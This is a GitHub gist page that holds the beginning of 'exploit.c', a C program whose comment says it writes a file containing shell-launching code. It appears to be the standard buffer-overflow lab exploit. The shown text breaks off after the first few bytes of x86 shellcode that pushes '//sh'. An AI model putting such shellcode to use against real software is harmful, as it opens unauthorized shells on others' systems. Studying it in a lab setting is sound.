Skip to content

Instantly share code, notes, and snippets.

View binary132's full-sized avatar
🎩
✧*。ヾ(。>﹏<。)ノ゙✧*。

Bodie binary132

🎩
✧*。ヾ(。>﹏<。)ノ゙✧*。
View GitHub Profile
@binary132
binary132 / exploit.c
Last active December 14, 2015 18:59 — forked from anonymous/exploit.c
/* exploit.c */
/* A program that creates a file containing code for launching shell*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char shellcode[]=
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68""//sh" /* pushl $0x68732f2f */